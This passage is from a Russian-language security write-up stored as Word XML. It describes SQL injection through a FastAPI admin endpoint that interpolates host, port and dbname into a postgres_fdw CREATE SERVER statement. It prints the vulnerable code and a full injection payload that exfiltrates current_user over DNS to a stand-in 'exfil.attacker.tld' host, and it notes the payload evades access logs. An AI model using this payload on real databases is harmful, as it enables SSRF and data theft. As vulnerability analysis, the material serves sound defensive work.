          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обёртка-клиент PostgreSQL к внешним PostgreSQL-серверам поверх libpq. Через цепочку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE USER MAPPING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FOREIGN TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, упакованную в анонимный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-блок, атакующий получает SSRF на любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host:port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от имени процесса postgres и параллельный DNS-эксфильтрационный канал в одном векторе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026EEA26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74197092" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/admin.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0076CC"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1FDA2DED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from pydantic import BaseModel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020B152" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F508F"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05025984" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630CF15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.core.logging import get_logger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59851FF6"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6327F735" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F439A1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B95DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log = get_logger("app.admin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330FE87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A14034" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A290FD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class RegisterForeignSourceRequest(BaseModel):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54508164" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F80C992" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    host: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1C39F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    port: int = 5432</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767AA5F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    dbname: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D0011" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71386D35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC26CB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/admin/foreign-sources")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D14FAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def register_foreign_source(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEA2CE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    req: RegisterForeignSourceRequest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8CB2B"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21270E22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; dict:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255FC33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9262A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"DO $$ BEGIN "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F9F9FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"CREATE SERVER IF NOT EXISTS {req.name} "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F84BDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"FOREIGN DATA WRAPPER postgres_fdw "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482EE73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"OPTIONS (host '{req.host}', port '{req.port}', dbname '{req.dbname}'); "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0255BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"END $$;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA03B0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60066A8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713223E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    log.info("admin.foreign_source_registered", name=req.name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B97FA62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"status": "registered"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D548D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>req.host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую в строковый литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (host '...')</w:t>
      </w:r>
      <w:r>
        <w:t>. Эндпоинт защищён только аутентификацией admin-роли — никакой валидации значений. JSON-body не торчит в Common Log Format → payload не виден в access-логе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D515B9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — DNS-канал, простой (current_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534B7A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Внедрение в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> закрывает литерал OPTIONS, дальше внутри уже-открытого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-блока добавляется атакующая цепочка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('... %L ...', current_user || '.exfil.attacker.tld')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Прямо в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нельзя — OPTIONS принимает только строковые литералы, не выражения. Поэтому динамический SQL обязателен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427685C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `req.host`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F692F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', port '5432', dbname 'x'); EXECUTE format('CREATE SERVER ev FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)', current_user || '.exfil.attacker.tld'); CREATE USER MAPPING FOR CURRENT_USER SERVER ev OPTIONS (user 'x', password 'x'); CREATE FOREIGN TABLE t_ev(c text) SERVER ev OPTIONS (table_name 't'); PERFORM * FROM t_ev; END $$; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970AA48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241477F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D60CDF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER IF NOT EXISTS app_src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C98B98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFCEF35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OPTIONS (host '', port '5432', dbname 'x');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45718571" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F191AF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'CREATE SERVER ev FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B4FB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    current_user || '.exfil.attacker.tld'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259CFF5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
